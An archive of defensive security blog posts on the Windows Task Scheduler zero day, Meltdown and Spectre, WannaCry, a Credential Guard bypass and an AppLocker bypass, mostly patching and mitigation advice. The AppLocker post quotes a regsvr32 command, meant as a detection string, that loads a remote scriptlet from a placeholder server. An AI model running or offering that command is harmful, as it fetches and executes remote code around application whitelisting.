Tag Archives: Microsoft Windows 10

Protecting Against the Windows 10 Task Scheduler Zero Day Vulnerability

====================
Update: 5th September 2018:
====================
As previously advised; exercising caution when receiving emails with attachments will keep you safe from the following malware now exploiting this vulnerability.

Your anti-malware software will likely also protect you from this exploit since the majority of vendors are detecting (verified using VirusTotal) the file hashes listed in the security firm Eset’s blog post:

Eset have detected attackers delivering an exploit for this vulnerability via email. The exploit targets victims in the following countries:

  • Chile
  • Germany
  • India
  • Philippines
  • Poland
  • Russia
  • Ukraine
  • United Kingdom
  • United States

The attackers have made small changes of their own to the published proof of concept code. They have chosen to replace the Google Updater (GoogleUpdate.exe)(which runs with admin privileges (high level of integrity)) usually located at:

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

They replace the updater with a backdoor application of their own that is run with the highest privilege namely System level integrity. This is a stage one of their attack. If the attackers find anything of interest on the infected system a second stage is downloaded allowing them to carry out any commands they choose, upload and download files, shutting down an application or parts of Windows of their choice and listing the contents of the data stored on the system.

The attackers also use the following tools to move from system to system across (laterally) a network: PowerDump, PowerSploit, SMBExec, Quarks PwDump, and FireMaster.

Thank you.

====================
Original Post:
====================
With the disclosure early last week of zero day vulnerability (defined) I wanted to provide some advice on staying safe while a patch from Microsoft is being developed.

What systems are affected and how can an attacker use this vulnerability to compromise systems?
Once this pre-developed working exploit is delivered to a 64 bit Windows 10 system it can be used to provide an attacker with the highest level of privilege (System level access) on that system allowing them to carry out any action they choose. They can achieve this by changing permissions on any file stored on a system thus giving them the ability to replace/change any file. When a system service executes what it believes to be a legitimate file but is instead the attacker substituted file; the attacker obtains the privileged access of that service.

The effectiveness of this exploit has been verified by Will Dorman from the CERT/CC. 32 bit versions of Windows are also affected. For Windows 8.1 and Windows 7 systems; the exploit would require minor changes before it can result in the same level of effectiveness (but may be inconsistent on Windows 7 due to the hardcoded XPS printer driver (defined) name within the exploit).

An attacker must already have local access to the systems they wish to compromise but could obtain this using an email containing an attachment or another means of having a user click on a link to open a file. The base CVSS score of this vulnerability is 6.8 making it make of medium severity for the above reasons.

How can I protect myself from this vulnerability?
Standard best practice/caution regarding the opening of email attachments or clicking links within suspicious or unexpected email messages or links from unknown sources will keep you safe from the initial compromise this exploit code requires to work correctly.

The advisory from the CERT/CC has also been updated to add additional mitigations. BEFORE deploying these mitigations please test them thoroughly since they can “reportedly break things created by the legacy task scheduler interface. This can include things like SCCM and the associated SCEP updates”.

A further option you may wish to consider is the deployment of the following micropatch from 0Patch. This patch will automatically cease functioning when the relevant update from Microsoft is made available. As with the above mitigations; if you wish to deploy this micropatch please test how well it works in your environment thoroughly BEFORE deployment.

Further advice on detecting and mitigating this exploit is available from Kevin Beaumont’s post.

Thank you.

Blog Post Shout Out: June 2018

A number of varied security issues have come to my attention this week which I wanted to keep you informed of. I will provide a respectable shout out to the following sources:

Apple Encrypted Drive Information Disclosure:
At this time Apple macOS has an information disclosure vulnerability that affects encrypted drives in general (encrypted Apple HFS+ / APFS+ and VeraCrypt) that provide the potential for an attacker to obtain details of the files an encrypted hard drive is storing.

This vulnerability originates from the quick look feature of macOS; which allows a user to preview photos, files and folders quickly without having to open them. This feature stores the thumbnails (defined) of the files centrally in a non-encrypted area of the hard disk. This issue can also occur when a USB memory drive is inserted; the same feature stores thumbnails on the external drive and on the boot drive of the macOS system.

If you use an encrypted hard disk or value your privacy when using external drives, please run the following command documented at the end of the following news article after you have viewed sensitive info and want to clear that history/activity:

macOS Breaks Your OpSec by Caching Data From Encrypted Hard Drives: BleepingComputer by Catalin Cimpanu

This suggestion is a workaround until (and if) Apple patches this.

=================
Yubico WebUSB Bypass:
The two-factor authentication/secure login vendor, Yubico has published a security advisory for the use of their YubiKeys. The vulnerability does not reside within the hardware keys themselves but in the authentication steps a web browser (e.g. Google Chrome) uses to authenticate an individual.

In summary, if you are using Google Chrome, please ensure it is updated to version 67 or later and follow the additional suggestion from Yubico in their security advisory:

Security Advisory 2018-03-02 – WebUSB Bypass of U2F Phishing Protection: Yubico

Windows 10 Persistent Malware:
The security vendor BitDefender have published a 104 page report detailing a spyware (defined) which uses rootkit functionality (defined). This malware is noteworthy due to its longevity (dating back to 2012) and it’s ability to install even on modern versions of Windows e.g. Windows 10:

Six Years and Counting: Inside the Complex Zacinlo Ad Fraud Operation: BitDefenders Labs

=================
On a side note I am not too surprised this infection can persist on Windows 10. If a user is tricked into running malware e.g. by clicking a link or opening an attachment either of which can be contained in  a phishing (defined) email or an even more convincing spear phishing (defined) email from an organization or colleague you trust; strong defences won’t always keep you from becoming infected.

The BitDefender report can be downloaded from the above link (it does not request any personal information).

=================
The following news article links to 2 detailed but still easy to follow removal guides. If you are experiencing un-wanted adverts showing within websites that don’t usually show them (even though you are using an ad blocker) or are experiencing re-directs namely you wish to visit website A but are actually sent to website B, please follow these guides to remove this malware:

Rootkit-Based Adware Wreaks Havoc Among Windows 10 Users in the US: BleepingComputer: by Catalin Cimpanu
=================

Thank you.

Responding to the Meltdown and Spectre Vulnerabilities

=======================
Please scroll down for more updates to this original post.
=======================
====================
Update: 23rd May 2018:
====================
For information on the Spectre NG vulnerabilities please refer to this new blog post

Thank you.

=======================
Original Post:
=======================
Earlier in January updates for Linux, Apple and Windows were made available to work towards addressing the 3 security vulnerabilities collectively known as Meltdown and Spectre.

Why should these vulnerabilities be considered important?
I’ll provide a brief summary of the two categories of vulnerabilities:

Meltdown (CVE-2017-5754): This is the name of the vulnerability discovered that when exploited by an attacker could allow an application running with standard privileges (not root or elevated privileges) to read memory only intended for access by the kernel.

Spectre (Variant 1: CVE-2017-5753 ; Variant 2: CVE-2017-5715): This is a category of two known vulnerabilities that erode the security boundaries that are present between applications running on a system. Exploitation can allow the gathering of information from applications which could include privileged information e.g. usernames, password and encryption keys etc. This issue can be exploited using a web browser (e.g. Apple Safari, Mozilla Firefox, Google Chrome, Microsoft Edge (or IE) by using it to record the current time at very short intervals. This would be used by an attacker to learn which memory addresses were cached (and which weren’t) allowing the attacker to read data from websites (violating the same-origin policy) or obtain data from the browser.

Browser vendors have responded by reducing the precision of JavaScript timing and making it more unpredictable while other aspects of JavaScript timing (using the SharedArrayBuffer feature) have been disabled.

More in-depth (while still being less technical) descriptions of these issues are available here , here and here.

How can I protect myself from these vulnerabilities?
Since these vulnerabilities are due to the fundamental architecture/design of modern CPUs; it is not possible to fully address them. Instead a combination of software fixes and microcode updates (defined) is more a viable alternative than re-designing the established architecture of modern CPUs.

In-depth lists of updates available from multiple vendors are available here and here. I would suggest glancing at the affected vendors and if you own a device/product from them; checking if you are affected by these vulnerabilities. A list of BIOS (defined) updates from multiple vendors are available here. Google Chrome has a Site Isolation mode that can mitigate these vulnerabilities which will be more comprehensively addressed in Chrome version 64 scheduled for release last this month.

At this time my systems required updates from Google, Mozilla, Microsoft, Apple, VMware, Asus, Lenovo and Nvidia. Many of many existing desktops are unlikely to receive microcode and BIOS updates due to be more than 3 years old. However my Windows 10 laptop has received a BIOS update from the manufacturer.

Are there disadvantages to installing these updates?
While these updates increase security against these vulnerabilities; performance issues and stability issues (Intel and AMD) after the installation of these updates have been reported. These vary in severity but according to Intel and Microsoft the updates will be refined/optimised over time.

Benchmarks (for desktops) made available by TechSpot show negligible impact on most tasks that would stress a CPU (defined). However any work that you perform which makes of large files e.g. databases may be significantly impacted by the performance impact these updates have when accessing files on disk (mechanical and solid state). For laptops the slowdown was felt across almost all workload types. Newer and older silicon were inconsistently impacted. At times even some Intel 8th generation CPUs were impacted more than 5th generation CPUs.

Details of the anticipated performance impact for Linux, Apple macOS (and iOS) and Windows are linked to. Further reports of reduced performance from Intel and Apple devices have also been recorded. Further details of a feature known as PCID (Process-Context Identifiers) within more recent CPUs which will help reduce the performance impact are provided here. For Intel CPUs, 4th generation Core CPUs and later should include it but any CPU manufactured after 2011 should have it (one of my CPUs; a Core i7 2600K has this feature, verified using Sysinternals Coreinfo). A full list of Intel CPUs affected by these vulnerabilities is here.

Conclusion:
With the widely reported stability and performance issues present it is your decision if you install the necessary updates now or wait until further refinements. If you experience issues, please report them to the manufacturers where possible and within online forums if not. More refined updates will only be created if a need to do so is established.

I’m in the process of updating my systems but will benchmark them before and after each updates to determine an impact and make a longer term decision to keep the updates or uninstall them until further versions become available. I’ll update this post as I gather more results.

=======================
Update: 16th January 2018:
=======================
A newly released free utility from Gibson Research (the same website/author as the well-known ShieldsUp firewall tester) named InSpectre can check if your Windows system has been patched against Meltdown and Spectre and can give an indication of how much the performance of your system will be affected by installing and enabling the Windows and/or the BIOS updates.

Please note: I haven’t tried this utility yet but will this weekend (it will help with the tests I’m carrying out (mentioned above). I’ll update this post when I have tried out this utility.

Thanks again.

=======================
Update: 24th January 2018:
=======================
As promised I gathered some early results from a selection of CPUs and the results for all but recent CPUs are evidence they will experience a potentially noticeable performance drop:

====================
CPUs supporting PCID (obtained using Sysinternals Coreinfo):
Intel Core i7 Extreme 980X @ 3.33 GHz
Intel Core i7 2600K @ 3.8 GHz
Intel Core i5 4590T @ 3.3 GHz
Intel Core i7 6500U (laptop CPU) @ 2.5 GHZ

CPUs supporting INVPCID (obtained using Sysinternals Coreinfo):
Intel Core i5 4590T @ 3.3 GHz
Intel Core i7 6500U (laptop CPU) @ 2.5 GHZ
====================

Explanations of the purpose and relevance of the PCID and INVPCID CPU instructions are available from this Ars Technica article. The results from InSpectre only show positive results when both PCID and INVPCID are present backing up the observations within the above linked to Ars Technica article (that the updates take advantage of the performance advantages of these instructions when both are present).

The results from InSpectre back up these findings by stating that the 980X and 2600K will not deliver high performance protection from Meltdown or Spectre. Since my PCs are mainly used for more CPU intensive tasks (rather than disk intensive) e.g. games and Folding@Home; I still don’t expect too much of a performance decrease. The older CPUs are due for replacement.

You may ask; “why am I so concerned with the performance impact of these updates?” The answer is that significant time and investment has been made into the above systems for them to perform at peak performance for the intended tasks I use them for. Performance and security are both very important to me and I believe there should only be a small trade off in performance for better security.

My next step will be to benchmark the CPU, hard disk and GPU of each system before and after installing each update. I will initially do this for the 6500U and 2600K systems and provide these results. The categories of updates are listed below. I will keep you informed of my findings.

Thank you.
====================
Update 1: Software updates from Microsoft for Meltdown and Spectre
Update 2: Firmware update (where available)
Update 3: Nvidia / AMD GPU driver update
====================

=======================
Update: 13th February 2018:
=======================
Sorry for the long delay (I was travelling again for my work). The above benchmarking is now taking place and I will make the results available as soon as possible. Thanks for your understanding.

=======================
Update: 27th February 2018
=======================
Earlier last week Intel made available further microcode updates for more CPUs. These updates seek to address variant 2 of the Spectre vulnerability (CVE-2017-5715). Updates are now available for the CPUs listed below.

As before, please refer to the manufacturer of your motherboard of your system for servers, desktops and laptops or the motherboard manufacturer for any custom built systems you may have to determine if these updates have been made available for your specific systems. Further information for corporate system administrators containing details of the patching process is available within this link (PDF):

  • Kaby Lake (Intel 7th Generation Core CPUs)
  • Coffee Lake (Intel 8th Generation Core CPUs)
  • Further Skylake CPUs (Intel 6th Generation Core CPUs)
  • Intel Core X series (Intel Core i9 CPUs e.g. in the 7900 and 7800 model range)
  • Intel Xeon Scalable (primarily targeted at data centres)
  • Intel Xeon D (primarily targeted at data centres)

Information on patches now available for OpenBSD and FreeBSD are located within the following links:

OpenBSD:
OpenBSD mailing list
The Register: OpenBSD Patch now Available

FreeBSD:
FreeBSD Wiki
Softpedia: Spectre and Meltdown mitigations now available

=======================
Update: 1st April 2018
=======================
As vendors have responded to these vulnerabilities; updates have been released for many products. I will describe these updates in more detail below. Apologies if I have omitted any, this isn’t intentional but the list below should still be useful to you:

=======================
Google ChromeOS:
=======================
Following the release of ChromeOS 64 in February which provided updates against the Meltdown and Spectre vulnerabilities, ChromeOS 65 includes further mitigations against these vulnerabilities including the more efficient Retpoline mitigation for Spectre variant 2.

=======================
Sony Xperia:
=======================
In late February Sony made available updates which include mitigations for Meltdown and Spectre for their Xperia X and Xperia X Compact phones which brings the build number to 34.4.A.2.19

=======================
Microsoft Issues Microcode Updates:
=======================
As previously mentioned when this blog post was first published; updates for the Meltdown and Spectre vulnerabilities are made up of software updates, microcode updates and firmware (BIOS updates) and GPU drivers.

Due to the complexity of updating the firmware of computer systems which is very specific and potentially error prone (if you apply the wrong update to your device it can render it useless, meaning it will need to be repaired/replaced (which is not always possible) Microsoft in early March began to issue microcode driver updates (as VMware describes they can be used as substitutes for firmware updates). Microcode updates have been issued in the past to address CPU reliability issues when used with Windows.

=======================
Intel Firmware Updates:
=======================
As with previous microcode updates issued by Intel in late February; these updates seek to resolve variant 2 of the Spectre vulnerability (CVE-2017-5715).

While Intel has issued these updates; they will be made available separately by the manufacturer of your motherboard of your system for servers, desktops and laptops or the motherboard manufacturer for any custom built systems you may have. You will have to determine from the updates those vendors issue if they are available for the products that you own.

Unfortunately not all systems will receive these updates e.g. most recent system was assembled in 2014 and has not received any updates from the vendor; the vendor has issued updates on their more recent motherboards. Only my 2016 laptop was updated. This means that for me; replacing the systems gradually is the only means of addressing variant 2 of the Spectre vulnerability.

Intel’s updates are for the Broadwell (5th generation CPUs i.e. 5000 series) and Haswell (4th generation CPUs i.e. 4000 series).

=======================
Microsoft Surface Pro:
=======================
Earlier this week Microsoft released firmware updates for their Surface Pro which mitigate the Meltdown and Spectre vulnerabilities. This link provides further details and how to install the updates.

=======================
Microsoft Issues Further Security Update on the 29th March:
=======================
As noted in my separate post; please refer to that post for details of a security update for Windows 7 SP1 64 bit and Windows Server 2008 R2 SP1 64 bit that resolve a regression (an un-intentional coding error resulting in a previously working software feature no longer working, alternative definition here) which introduced an additional elevation of privilege (defined) security vulnerability in the kernel (defined) of those Windows versions.

=======================
Microsoft Offers Bug Bounty for Meltdown and Spectre vulnerabilities:
=======================
Microsoft have announced bug bounties from $5000 to $250,000 to security researchers who can locate and provide details of exploits for these vulnerabilities upon Windows, Azure and Microsoft Edge.

If such a programme is successful it could prevent another instance of needing to patch further related vulnerabilities after the issues have been publicly disclosed (defined). This is sure to assist the system administrators of large organisations who currently in the process of deploying the existing updates or who may be testing systems on a phased basis to ensure performance is not compromised too much.

Further details are available from this link.

=======================
Update: 6th April 2018
=======================
Earlier this week, Intel issued a further progress update for the deployment of further microcode for their CPUs.

A further 5 families of CPUs have now completed testing and microcode updates are available. These families are:

    • Arrandale
    • Clarkdale
    • Lynnfield
    • Nehalem
    • Westmere

==================
However a further 9 families will not receive such updates for the reasons listed below. Those families are:

      • Micro-architectural characteristics that preclude a practical implementation of features mitigating [Spectre] Variant 2 (CVE-2017-5715)
      • Limited Commercially Available System Software support
      • Based on customer inputs, most of these products are implemented as “closed systems” and therefore are expected to have a lower likelihood of exposure to these vulnerabilities.

==================

      • Bloomfield
      • Clarksfield
      • Gulftown
      • Harpertown Xeon
      • Jasper Forest
      • Penryn
      • SoFIA 3GR
      • Wolfdale
      • Yorkfield

This announcement from Intel means my Intel Core i7 Extreme 980X (from 2010) won’t receive an update. This system isn’t used very much on the internet and so the impact is limited. I am hoping to replace this system in the near future too.

Recommendations:

Please review the updated PDF made available by Intel (I can upload the PDF to this blog if Intel place it behind an account which requires sign in. At this time the PDF link still works).

As before; please monitor the websites for the manufacturer of your system for servers, desktops and laptops or the motherboard manufacturer for any custom built systems you may have to determine if these updates have been made available for your specific systems.

Thank you.

==================
BranchScope Vulnerability Disclosed:
In a related story; four security researchers from different universities responsibly disclosed (defined) a new side channel attack affecting Intel CPUs. This attack has the potential to obtain sensitive information from vulnerable systems (a similar result from the existing Meltdown and Spectre vulnerabilities).

Further details of this attack named “BranchScope” are available in this Softpedia article and this paper from the researchers. Within the above article Intel responded to this attack stating that this vulnerability is similar to known side channel and existing software mitigations (defined) are effective against this vulnerability. Their precise wording is provided below.

Thank you.

==================
An Intel spokesperson has provided the following statement:

“We have been working with these researchers and have determined the method they describe is similar to previously known side channel exploits. We anticipate that existing software mitigations for previously known side channel exploits, such as the use of side channel resistant cryptography, will be similarly effective against the method described in this paper. We believe close partnership with the research community is one of the best ways to protect customers and their data, and we are appreciative of the work from these researchers.”
==================

=======================
Update: 13th April 2018
=======================
AMD have issued microcode (defined) updates for Windows 10 Version 1709 to enhance the protection of their customer’s against variant 2 (CVE-2017-5715) of the Spectre vulnerability. Further details of these updates are available within these KB articles: KB4093112 and KB3073119

Thank you.

=======================
Update: 18th May 2018
=======================
Please refer to the beginning of the May and April security update summaries for further updates related to addressing Spectre variant 2 (v2).

 

Windows 10 Fall Creator’s update to include EMET features

Late last month Microsoft published two blogs (here and here) which announce forthcoming security features being added to the Windows 10 Fall Creator’s Update (intended to be released in September 2017).

Among the features such as enhancements to the Windows Defender Advanced Threat Protection (ATP) are features such as Windows Defender Application Guard (intended to block zero day (defined) threats by isolating the threat), improved Windows Defender Device Guard and Windows Defender Exploit Guard. The final feature here, Exploit Guard is noteworthy since it will incorporate some of the mitigations (defined) previously available from EMET and will provide the ability to harden legacy applications, just like EMET did namely 32 bit Windows applications.

The improvements to Windows Defender Exploit Guard don’t stop there; it introduces new mitigations and vulnerability prevention capabilities. Moreover a new class of mitigations leveraging intelligence from the Microsoft Intelligent Security Graph (ISG), will include intrusion rules to protect against more advanced threats e.g. zero days exploits. Exploit guard will act as “an extra layer of defense against malware attacks in-between the firewall and antivirus software.”

As a fan of Microsoft EMET, it’s great to see it’s return. However whether it will be available in all versions of Windows 10 or only corporate managed Windows 10 Pro and Windows 10 Enterprise is not yet clear.

I will update this post when new information becomes available. Thank you.

Responding to Wana Decrypt0r / WanaCrypt0r Infections

As I am sure you are aware earlier this week a new variant of ransomware named WanaCrypt0r began to infect many systems worldwide using the vulnerability patched in March 2017. The infections were especially severe in the UK (hospitals were affected), Spain (banks, the ISP Telefonica and gas/electricity providers) among many others. The infections were spreading in a worm (defined) like fashion.

The ransomware uses the vulnerability exploited by the “Eternal Blue” exploit patched by Microsoft in Mach by their MS17-010 update. This exploit uses the SMBv1 (defined) protocol to enter a vulnerable system over port 445 (when that port is accessible from the internet). In some instances the CERT of Spain have observed the exploit installing the DoublePulsar malware on the already infected system. A live map of this malware’s global infections is available here. Once the malware obtains access to your system it installs the WanaCrypt0r ransomware to encrypt your files. As detailed by BleepingComputer it also terminates active databases and email servers so that it can encrypt them also.

On the 12th of May, the spread of the malware was temporarily halted by the actions of the malware researcher known as MalwareTech. They registered a website domain the malware checks if it exists while installing itself on your system. If it exists, it halts its installation and doesn’t encrypt your data (acting like a “kill switch”). I use the word temporary above since as the researcher points out all the malware authors need to do is to choose a different domain and re-release the updated malware (or worse they could use a domain generation algorithm (DGA)(defined) to make registering the websites by researchers even harder). The purpose of the malware checking if this domain was registered is to check if it is running inside a malware sandbox (defined).

How can I protect myself from this threat?
If you have not already done so, please install the MS17-010 security update (released in March 2017) on your Windows based servers and workstations. Researchers are simply saying “patch your systems” and that is what they mean. Microsoft discusses this advice in more detail in their MSRC blog post.

=======================
Note:
=======================
A full list of the versions of Windows affected by vulnerabilities patched within MS17-010 is provided at the end of this post.

If you are not sure how to update your systems, the following links below will assist if you are consumer/small business. Larger corporations should check with their IT team/system administrators install this update. If you can, please install all other remaining security updates:

Windows Vista
http://windows.microsoft.com/en-us/windows-vista/Turn-automatic-updating-on-or-off

Windows 7
http://windows.microsoft.com/en-US/windows7/products/features/windows-update

Windows 8.1
http://windows.microsoft.com/en-us/windows-8/windows-update-faq

Windows 10
http://pcsupport.about.com/od/keepingupwithupdates/f/windows-updates.htm

Microsoft have since released the MS17-010 update for all other remaining out of support Windows systems namely Windows XP, Windows Server 2003 and Windows 8.0. They are available as direct downloads from their MSRC blog post. I checked earlier today and these updates were not being offered by Windows Update and Automatic Updates for those older versions of Windows, please obtain the updates directly from their MSRC blog post.

While the “kill switch”for this malware was used (as mentioned above), it is very likely to return in the future. The steps below will better prepare you now and for the future.

I am aware Windows Vista is out of support at this time but it was supported when the MS17-010 update was released.

=======================
Update: 15th May 2017:
=======================
It is appears a new variant (Uiwix) of this threat is now circulating which does not have a kill switch. This variant does not appear to spread using a different vulnerability. Other variants are currently in-progress.

=======================
Update: 18th May 2017:
=======================
As mentioned above, newer variants of this malware are being made available. They exploit the same vulnerability as WannaCry but don’t spread in a worm like fashion.

I would suggest installing the MS17-010 as soon as possible since further ransomware is likely to capitalise on many devices (approximately 1 million still exposing the SMB protocol to the internet, with roughly 800k being Windows devices).

Moreover, the ShadowBrokers may release more exploits next month (and continue to do so on a regular basis) but this time we are unlikely to have security updates ready for them. My advice is to be prepared in June.

Thank you.
=======================

=======================
Update: 21st May 2017:
======================
The Eternals Rocks worm is now also spreading by exploiting exposed systems over SMB. The advice below to block installation of WannaCrypt should prevent infection of your systems. At this time, the worm is not carrying out malicious actions with infected devices. Instead it is setting up a C&C (C2)(defined) infrastructure and may leverage this for malicious actions in the future.

=======================
Bayer healthcare equipment was confirmed affected by WannaCry but service was restored in less than 24 hours. Other manufacturers have also issued security advisories:

Siemens

Smiths Medical

Medtronic

Johnson & Johnson

=======================
The US ICS CERT have issued an alert with recommendations for critical infrastructure devices. Affected vendors include those mentioned above and GE, Philips, Tridium, Emerson Automaton Solutions, Schneider Electric (among others).

Please note the above link for the ICS CERT advisory is https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-135-01D If this advisory is updated it will become https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-135-01E Further updates will change the final letter to F, G and so on.

=======================
ICS CERT also issued an FAQ on WannaCry which you may find useful.
=======================

Additional advice/considerations:
At this time there is no known way to decrypt your files if you have been effected by the WanaCrypt0r ransomware. If you have the option of restoring your files from a backup, please do so. Your only other option is discussed by BleepingComputer at the end of this article.

If you followed the advice earlier in the week and turned off your systems before they were infected, that was a wise precaution. However when you power them back on you will need to avoid them becoming infected before you can secure them. A French security researcher had a honeypot (defined) of theirs infected 6 times in 90 minutes.

If you can segregate your vulnerable devices (including devices within your network perimeter) so they don’t expose the following ports:

  • TCP port 445 with related protocols on UDP ports 137-138
  • TCP port 139
  • Also disable SMBv1 (it’s a deprecated protocol)
  • Please also block the Remote Desktop Protocol (RDP) port 3389 (defined) at the entry point to your corporate to prevent the spread of this malware as recommended by the US CERT.

Once you have updated your Windows devices against this vulnerability, please by all means resume normal operations but follow the advice of the US CERT and avoid having the SMB port exposed to the internet going forward as a defense in-depth measure (defined)(PDF).

Other recommendations are as follows:

  • It’s important to understand, installing the update mentioned in this post will protect your Windows systems from spreading the ransomware to other systems. If you click on a link in a suspicious email (or another source) the ransomware may still be downloaded but will only encrypt/effect your system.
  • For any critical systems, ask if they really need to be connected to the internet or not? Avoid unnecessarily connecting them.
  • Provide your staff with security awareness training (defined)(PDF). This will prevent this malware infecting your systems by means of phishing (defined) (which can still encrypt your data even if you have installed the above recommended security update, that update only blocks the spreading of the infection). According to the US CERT and HelpNetSecurity this advice isn’t confirmed but it will not reduce your protection.
  • Verify your organization can recover from a ransomware attack like this as part of your Business continuity process (BCP)(defined)(PDF).
  • If you have an incident response team, verify their standard response process against a ransomware attack like this to ensure it is fit for purpose.

Thank you.

 

=======================
Affected Windows versions:
=======================
While the MS17-010 security bulletin lists which versions of Windows are vulnerable to this ransomware, I have listed them all below (this applies to all 32 and 64 bit versions of Windows listed below):

Windows XP (with Service Pack 3)

Windows Server 2003 (with Service Pack 2)

Windows Vista (with Service Pack 2)

Windows Server 2008 (with Service Pack 2)

Windows Server 2008 (with Service Pack 2)(Server Core installation)(defined)

Windows 7 (with Service Pack 1)

Windows Server 2008 R2 (with Service Pack 1)

Windows Server 2008 R2 (with Service Pack 1)(Server Core installation)

Windows 8.0

Windows 8.1 (with 8.1 Update (April 2014))

Windows Server 2012

Windows Server 2012 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 R2 (Server Core installation)

Windows RT 8.1

Windows 10 Version 1507

Windows 10 Version 1511

Windows 10 Version 1607

Windows Server 2016

Windows Server 2016 (Server Core installation)

Windows 10 Credential Guard Bypassed

Despite the demonstrated successes and new security mitigations (specifically Credential Guard) of Windows 10 detailed by Microsoft in the link and PDF document listed below, security researchers from CyberArk have been able to obtain domain admin account (defined) credentials from the Local Security Authority (LSA) Secrets registry hive of Windows 10 using a technique similar to Pass the Hash (PtH)(defined):

https://technet.microsoft.com/en-us/itpro/windows/whats-new/security

https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf

Once obtained they injected the credentials into a newly created malicious service to achieve lateral movement (defined) which lead to the compromise of the domain controller (defined). The only requirement of the exploit the researchers developed was obtaining administrator access to a workstation within the domain.

While this could be considered a tall order, a well-designed spear phishing email (defined) with a malicious attachment or a malicious link targeting an unpatched or (zero day, defined) vulnerability on the workstation could be used to achieve privilege escalation (defined) and gain administrative rights (defined). Social engineering (defined) in combination with a malicious USB flash drive could also be a potential way of exploiting this. The methodology of how the CyberArk researchers carried out this exploit is available within their blog.

They also provide a list of mitigations for this exploit, many of which are well known and/or best practice. Microsoft responded to the team’s disclosure of this vulnerability that there will not be a fix since the system must already be compromised for it to succeed.

Thank you.

Windows AppLocker Bypass Disclosed

Update: 26th April 2016:
After some further research, this bypass can be blocked by denying regsvr32.exe and regsvr64.exe (depending on your systems architecture) from accessing the internet.

These files are usually present in the following directories (folders):

C:\Windows\System32 (32 bit systems only)
C:\Windows\SysWOW64 (64 bit systems only)

For 64 bit systems you should block any regsvr32.exe or regsvr64.exe that you find in both of the above folders.

You can use your installed firewall to do this or use the built-in Windows Firewall to create a rule to do this. Example steps to create rules for the Windows Firewall are located here and here. Please refer to the support website of the manufacturer of your firewall or it’s user guide if you are using a 3rd party firewall.

Alternatively, you can create a YARA rule to detect the presence of the following string within the memory of the conhost.exe process that is spawned on Windows 7 and later when a script is executed:

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

The part of the string we are interested in detecting would be the text after the /i switch.

More information about the conhost.exe process is available in this article.

This bypass does not make changes to the Windows registry but .sct files may be found in the Temporary Internet Files folder. Another well-known security researcher Alex Ionescu said that Device Guard (of Windows 10), fully enabled with script protection will block this bypass as well.

Further discussion and advice for this issue are available within this blog post.

I hope that this information is useful. My thanks to a colleague (you know who you a
re!) for his very useful insights on this topic.

Thank you.

=======================
Original Post:
=======================
Last week a security researcher made publically available proof of concept code that has the ability to bypass Windows AppLocker (application whitelisting).

I have written about this issue separately using Yammer but will provide more discussion below:

Why Should This Issue Be Considered Important?
According to this ThreatPost article the researcher initially responsibly disclosed (defined) this issue to Microsoft. However, it is uncertain if Microsoft will create a security update or mitigation to address this issue since AppLocker is functioning by design. In 2011 a bypass to AppLocker was discovered by Didier Stevens which was later addressed by Microsoft with a hotfix.

With a known bypass of AppLocker now being disclosed the effectiveness of AppLocker has been significantly reduced. I’m hoping that for this new bypass a similar solution can be found. I’m a particular fan of AppLocker since it provides a strong defence against zero-day malware (defined) and ransomware (defined). It is also relatively easy to configure. An introductory post to configuring AppLocker would be this Malwarebytes blog post.

Since it runs with kernel level privileges (defined) it isn’t easy for an attacker to shut it down and can be configured to block code that is run by an administrator (defined) (unless that code is already whitelisted). The enhancements it received in Windows 10 e.g. blocking a script from being manually entered at the command prompt is a good example of defence in-depth (defined)(PDF) security.

How Can I Protect Myself From This Issue?
As mentioned above, at this time there is no known workaround for this bypass. While blocking Regsvr32.exe using AppLocker may seem like an obvious solution, this is a legitimate application that is often used by Windows especially during program installation and updates. Denying this application from running would likely lead to unexpected behavior.

I’ll monitor this issue and post here should further information become available. Thank you.